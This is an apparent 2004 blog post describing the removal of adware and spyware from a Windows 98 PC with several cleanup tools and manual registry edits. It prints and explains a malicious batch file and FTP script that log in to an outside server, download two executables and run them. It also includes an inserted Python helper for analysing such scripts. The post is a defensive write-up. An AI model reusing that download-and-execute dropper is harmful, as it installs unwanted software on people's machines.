Sun, Mar 28, 2004 10:20 pm

Windows 98 System Hanging After Login

My mother-in-law told me her Windows 98 PC hangs after she enters her name and password to log into it. She said that even if she waits a long time, she can't get any further. Rebooting the system puts it back in the same state.

When I tested the system, I found I could bring up the Windows Explorer with Ctrl-Alt-Del, which showed the following tasks.

Explorer
Starter
Systray
Scanregw

I ended the Scanregw task, but that didn't help and then I couldn't even bring up the task list again. I rebooted and logged in with my wife's userid and password. When I brought up the task list, again I saw the same tasks, but this time I saw "Not responding" listed after Explorer. I ended the Windows Explorer task and then the system appeared to perform normally. However, when I opened Windows Explorer, I saw "Finalizing installation" continually scrolling across Windows Explorer directly beneath the address bar.

The antivirus program wasn't shown in the system tray. When I went looking for the program with the Windows Explorer, I saw a Hotbar folder under the Program Files folder. I've encountered problems with this adware/spyware program on other systems and would not leave it on any PC I support.

The company that produces this adware/spyware claims "Hotbar enhances and personalizes your Internet & email applications" and can "make your emails unique with hundreds of animations, backgrounds and more" and allows you to "design & send FREE eCards from your existing email". They also state that Hotbar will "brighten your browser with colorful images & enhance your surfing experience with Smart Buttons!" But their "free" software comes with an unseen price tag. This software is likely to significantly impair the performance and stability of your system.

If you click on the Terms of Use and License link you will find the following:

HOTBAR COLLECTS AND STORES INFORMATION ABOUT THE WEB PAGES YOU VIEW AND THE DATA YOU ENTER IN SEARCH ENGINE SEARCH FIELDS WHILE USING THE SOFTWARE. HOTBAR USES THIS INFORMATION TO DETERMINE WHICH ADS AND BUTTONS TO DISPLAY ON YOUR HOTBAR TOOLBARS AND WHICH ADS TO SHOW YOUR BROWSER.

So you are subjecting yourself to "targeted" popup ads, if you install the software.

Hotbar.com states that you can use Windows control panel Add/Remove Programs option to rid yourself of this software by opting to remove Outlook Tools by Hotbar, Web Browser Tools by Hotbar, and Shopper Reports Adapter. Or you can download an uninstaller from the company's website at http://hotbar.com/downloads/HbUninst.exe. Instructions on how to manually remove the software can be found at http://www.kephyr.com/spywarescanner/library/hotbar/index.phtml. I usually rely on Spybot Search & Destroy to rid systems of adware and spyware. Spybot is a free adware/spyware detection and removal program, though you should make a donation to the developer to ensure he can continue to maintain and develop such a worthwhile program.

I also use Bazooka Adware and Spyware Scanner from Kephyr to locate adware/spyware on systems. It is also free, but you really should consider making a donation to help the developer continue his work. Bazooka Adware and Spyware Scanner does an excellent job detecting such software, but can't automatically remove such software. However, the developer does provide instructions on manually removing such software. I've found that Spybot and other adware/spyware removal tools, though they disable and remove most of the bits and pieces of adware/spyware they detect, sometimes will still leave a few files, registry entries, etc. that Bazooka will detect. I can then use the manual removal instructions on the Kephyr website to remove the last remnants of the programs.

I started a Spybot Search & Destroy scan of the system. Spybot found the following adware/spyware.

ClearSearch.Net
Comet Cursors
DSO Exploit
Hotbar
Lycos.SideSearch
Test - Browser Helper Object (BHO)
VX2/e
VX2/f
VX2/h.ABetterInternet

Interestingly, the PestPatrol webpage on ClearSearch reports that "Every time the computer is started, ClearSearch will remove the search-hijacking part of Xupiter, HuntBar/MSLink, CommonName, NewDotNet, the iWon toolbar/search assistant and Netword." So apparently the software will eliminate portions of competing adware/spyware.

I had Spybot remove all of the adware/spyware it found. Spybot couldn't remove all of it immediately, so I rebooted it to let it remove the rest of it at startup. However, the system hung again after Spybot completed its work. I used Ctrl-Alt-Del again and saw a list similar to what I had seen previously.

Explorer
Systray
Scanregw
Rundll32
Starter

I chose to shut down the system, but the system didn't shut down and I couldn't bring up the task list with Ctrl-Alt-Del again. I had to power the system off and on. When I logged in again, I didn't experience the problem with the system hanging. But when I ran Spybot again to make sure that it wasn't seeing any adware/spyware, it reported two registry keys still existed for Hotbar. I had it "fix selected problems" again and then repeated the scan. This time it reported "no immediate threats were found".

As an added precaution, I installed Ad-aware 6.0 on the system. Ad-aware is available in three versions. The standard version is free for non-commercial use. If you wish to have real-time monitoring and blocking capabilities to prevent adware/spyware being installed, purchase one of the other versions. They are relatively inexpensive given the time and aggravation they can spare you by preventing adware/spyware from being installed and subsequently causing crashes, freezes, etc. on your system.

Ad-aware reported it found 28 processes and 149 objects associated with adware/spyware on the system. It isn't unusual for a particular adware/spyware detection program to find adware/spyware that another program has missed or at least some files and registry entries associated with adware/spyware that remain even though the adware/spyware has been rendered ineffective. I've run Spybot after running Ad-aware on systems and found it has detected things that Ad-aware has missed. I usually run Ad-aware, Bazooka Adware and Spyware Scanner, and Spybot Search & Destroy on systems to ensure that no adware/spyware is left on a system. Before you run checks on a system, be sure to update the programs' reference files so that you are checking for recently detected adware/spyware.

Ad-aware reported a number of tracking cookies, which I'm not as concerned about, but objects associated with the adware/spyware listed below were found as well. I'm not concerned about Ad-aware finding Alexa, since the Alexa toolbar isn't installed. Even if a system doesn't have the Alexa toolbar installed, you will likely see Alexa reported by Ad-aware, since it comes bundled with Internet Explorer. The Adware and Under-Wear - The Definitive Guide article has further information on Alexa, as well as other adware/spyware. The article states that in 2001 a $1.9 million fine was levied against the company responsible for Alexa for violating users' privacy.

Alexa
ClearSearch
CometCursor
Coulomb Dialer
HotBar
VX2.BetterInternet
FavoriteMan
WinPup32

Ad-aware reported "Some objects could not be removed" and asked if I wanted to let Ad-aware remove them after the next reboot. The only one it reported was c:\program files\clearsearch\ie_clrsch.dll. I instructed it to remove the object after the next reboot and then rebooted the system. Ad-aware completed its check when the system booted and I reran the program yet again for good measure. This time the program didn't find any adware/spyware, reporting "0 New objects" were found.

There are still four items on the desktop that I believe are associated with ClearSearch, though. The file names are as follows:

o
o.bat
ClrSchP028.exe
Calsdr.exe

The batch file o.bat contained the following lines:

if not exist C:\WINDOWSstatuslog ftp -s:o
if exist ClrSchP028.exe ClrSchP028.exe
if exist calsdr.exe calsdr.exe

The first line checks to see if the file WINDOWSstatuslog exists in C:\. If the file doesn't exist, the File Transfer Protocol (FTP) program that comes with Windows is started. The "-s" specifies that a script should be executed (you can see other options by typing "ftp -h" at a command prompt). The script is a text file with the name of the file following the colon. In this case the name of the file is "o". After the first line is executed, the batch file will check to see if ClrSchP028.exe and calsdr.exe exist and will execute them if they exist. By checking for their existence first, the batch file avoids the display of an error message by your system.

Looking at the contents of the file titled "o", I see the following:

open downloads.default-homepage-network.com
tmpacct
12345
bin
get ClrSchP028.exe
get calsdr.exe
bye

The first line tells the ftp program to open a connection to the system downloads.default-homepage-network.com. An FTP server will prompt for a userid and password. So the second line transmits a userid of "tmpacct" and the following line transmits the password "12345". On the next line, the "bin" command sets the file transmission mode to use binary rather than text transmissions. That command is needed to ensure that there is no attempt to translate end of line markers in files transmitted. The next two "get" commands instruct the FTP server to transmit the two programs, ClrSchP028.exe and calsdr.exe. The last line terminates the connection to the FTP server.
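The following Python triage helper is an added example, not part of the original post: it reads a batch file and the FTP command script it references, as the two walkthroughs above do by hand, and reports the server, login, and which downloaded files the batch file then runs. The function names are hypothetical, and it handles only the open/bin/get script form shown here.

```python
import re

# Sample input: the two desktop files as quoted on this page.
O_BAT = r"""if not exist C:\WINDOWSstatuslog ftp -s:o
if exist ClrSchP028.exe ClrSchP028.exe
if exist calsdr.exe calsdr.exe
"""
O_SCRIPT = """open downloads.default-homepage-network.com
tmpacct
12345
bin
get ClrSchP028.exe
get calsdr.exe
bye
"""

# Command word of a batch line, skipping an `if [not] exist <path>` guard.
CMD_RE = re.compile(r"^\s*(?:if\s+(?:not\s+)?exist\s+\S+\s+)?(\S+)", re.I)

def parse_ftp_script(text):
    """Extract host, login and requested files from an `ftp -s:` script."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    info = {"host": None, "user": None, "password": None, "binary": False, "gets": []}
    it = iter(lines)
    for line in it:
        words = line.split()
        cmd = words[0].lower()
        if cmd == "open" and len(words) > 1:
            info["host"] = words[1]
            # The next two lines answer the server's userid/password prompts.
            info["user"], info["password"] = next(it, None), next(it, None)
        elif cmd in ("bin", "binary"):
            info["binary"] = True
        elif cmd in ("get", "recv") and len(words) > 1:
            info["gets"].append(words[1])
    return info

def triage(bat_text, scripts):
    """For each `ftp -s:<name>` call, report what is fetched and then executed."""
    run = {m.group(1).lower() for m in map(CMD_RE.match, bat_text.splitlines()) if m}
    report = []
    for name in re.findall(r"\bftp\b.*?-s:(\S+)", bat_text, re.I):
        info = dict(parse_ftp_script(scripts.get(name, "")), script=name)
        info["fetched_then_run"] = [f for f in info["gets"] if f.lower() in run]
        report.append(info)
    return report

if __name__ == "__main__":
    print(triage(O_BAT, {"o": O_SCRIPT}))
```

A non-empty fetched_then_run list is the download-and-execute pattern described above; the host and file names it returns are the values to search for in firewall or proxy logs.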

So, if the two files were received from the FTP server they will be executed by the o.bat batch file. Looking at the ClrSchP028.exe file with FileAlyzer, a tool available from the developer of Spybot Search & Destroy, which will allow one to analyze the contents of files, I see there is a company name, Clear Search, listed in the file (see Figure 1). Using FileAlyzer's hex dump capability, I looked for text in the file. I see the program will attempt to contact sds.clrsch.com for updates (see Figure 2).

I deleted the four ClearSearch files from the desktop by right-clicking on them and choosing "delete".

If you have a question about whether a program is spyware you can go to Spychecker and enter the name of the program in its search field. The site also has links to a number of anti-spyware tools. You can also check on a file using Kephyr's searchable database.

I updated the Norton Antivirus 2000 virus definitions and checked the system with that program as well. It found a Trojan on the system, which it quarantined.

Name Virus
do.exe Download.Trojan

While I was checking the folders under C:\Program Files, I noticed there was a C:\Program Files\ClearSearch folder still on the system. The only file in it, IE_ClrSch.DLL, is a 78 KB file dated 3/22/04 8:13 PM. When I tried to remove the file, I received a message that "the specified file is being used by Windows." I ran another Ad-aware scan, which found ClearSearch again. It reported the following for ClearSearch:

Vendor       Type      Category    Object
ClearSearch  Regkey    Data Miner  HKEY_LOCAL_MACHINE:SOFTWARE\CLRSCH
ClearSearch  RegValue  Data Miner  HKEY_CURRENT_USER:Software\Microsoft\Internet Explorer\URLSearchHooks\
ClearSearch  Folder    Data Miner  c:\program files\ClearSearch\
ClearSearch  File      Data Miner  c:\program files\clearsearch\ie_clrsch.dll

When I requested Ad-aware remove the adware/spyware it found, it reported the following:

Some objects could not be removed.
Try closing all open browser windows prior to the removal
If this does not help, reboot and run Ad-aware again.

C:\program files\clearsearch\ie_clrsch.dll

I had two Internet Explorer windows open while I was running Ad-aware, which might have led to the message. When I rebooted and Ad-aware ran again, it reported it didn't detect any more adware/spyware after it ran. But the ClearSearch folder and ie_clrsch.dll file were still on the system.

I finally resorted to the manual removal instructions at http://www.kephyr.com/spywarescanner/library/clearsearch.bho1/index.phtml . I rebooted the system and hit F8 as it rebooted to obtain the Microsoft Windows 98 Startup Menu. I then chose Safe Mode. I then took the following steps:

  1. Click on Start and select Run
  2. Type regedit and hit enter
  3. Look for the key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000240} and delete it, if found, by clicking on it to select it and then clicking on Edit followed by Delete.
  4. . When you click on it, you will see "IEHooks Class" in the right pane under "Data".
  5. Delete the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00000000-0000-0000-0000-000000000240}, if it exists. You will see "Clear Search" under the "Data" column in the right-hand pane of the Registry Editor window when you select this key.
  6. Click on "Registry", then "Exit" to exit the registry editor.
  7. Delete the ClearSearch folder under the Program Files folder
  8. Restart the computer in normal mode
  9. Start Internet Explorer, click on Tools, Internet Options, Programs, and then click on the "Reset Web Settings" button. When asked if you want to reset your Web settings to their original Internet Explorer defaults, click on "Yes".
